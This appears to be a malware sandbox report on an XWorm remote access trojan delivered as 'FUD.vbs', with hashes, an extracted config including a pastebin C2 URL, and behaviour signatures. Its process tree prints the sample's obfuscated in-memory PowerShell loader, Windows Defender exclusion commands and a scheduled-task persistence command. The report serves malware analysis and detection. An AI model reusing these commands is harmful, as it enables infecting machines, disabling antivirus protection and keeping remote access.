Overview

overview

10

Static

static

1

FUD.vbs

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    33s
  • max time network
    54s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250218-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250218-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    07/03/2025, 21:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FUD.vbs

  • Size

    97KB

  • MD5

    457f2d4041d1873ebb7c33d0ccd41469

  • SHA1

    b70963db9423a72ae7a0e7b25ab48510c27af6c0

  • SHA256

    fc6447a6f4407fe43119c51d7c070a23c2b21f3bd1ed80d45245a49aa8e2fa3b

  • SHA512

    6e623f91e07ce6ecb50581cd8d45c67a7d37f2a77ebe2d1b208722ea12de595dfcea75c1946d37b8f430978beb2227d074857f0b1749daba562ecac0baae65ec

  • SSDEEP

    1536:p6GSeymei7zi/ABajxVOS2DAcsPteLg0xHEe+4ho7xnxPgGlyNowKBjh:p6GKmV7zqAB852DActMne+UIDzwNotB1

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    injector.exe

  • pastebin_url

    https://pastebin.com/raw/DSFaHH8B

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.vbs'; $lionfish = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $lionfish = -join $lionfish[-1..-$lionfish.Length];[<##>AppDomain<##>]::<##>('IwuurrentDomain'.replace('Iwu','C'))<##>.<##>('afterlifesoad'.replace('afterlifes','L'))([Convert]::FromBase64String($lionfish))<##>.<##>('HormuzntryPoint'.replace('Hormuz','E'))<##>.<##>('Infreakishoke'.replace('freakish','v'))($Null,$Null)<##>;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4700
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\injector.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'injector.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1912
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "injector" /tr "C:\Users\Admin\injector.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5108

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    f0f59cccd39a3694e0e6dfd44d0fa76d

    SHA1

    fccd7911d463041e1168431df8823e4c4ea387c1

    SHA256

    70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

    SHA512

    5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    db223e6a6930c11ea4786cb99ee7b25c

    SHA1

    e2dd6c28cb79dcf3424b55234ea627e590ec80b9

    SHA256

    aa54c6b65dfea35f2edb8a90e866a0632fe6e2be002ed509cb794a1c2befcee9

    SHA512

    7d827f5b81beae0274a0a34c3cdc24c7ef0e853231aa4aa61be765bca4e205fe776828e8c8b8fb55c542ae0f941b054efb6d7ac8c3fd57ddadf4114523d65228

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    3c24e75e9855bcbefbef9f6b68ae286f

    SHA1

    6ceb908c0875df779ac14df6b0f8d8198580ce2c

    SHA256

    e57af5784710dfa6a9e65effe44b2c455bd01ebb371001cc10b8c19b3e9e69de

    SHA512

    3bd0b6733bd3f53f897d2b9bf4c778a8f5ab19d0cb634dd59793f06c5c37a04c59cd4328ed993e214e4ffd6fca319de7b83bdabbb166c9b06cacc61647d5be1a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j4dqt14o.bkl.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/5992-12-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5992-14-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5992-15-0x000002657D5F0000-0x000002657D608000-memory.dmp

    Filesize

    96KB

    Download

  • memory/5992-13-0x000002657D640000-0x000002657D684000-memory.dmp

    Filesize

    272KB

    Download

  • memory/5992-0-0x00007FFE6DD33000-0x00007FFE6DD35000-memory.dmp

    Filesize

    8KB

    Download

  • memory/5992-11-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5992-1-0x000002657D100000-0x000002657D122000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5992-61-0x00007FFE6DD33000-0x00007FFE6DD35000-memory.dmp

    Filesize

    8KB

    Download

  • memory/5992-62-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5992-64-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5992-68-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB

    Download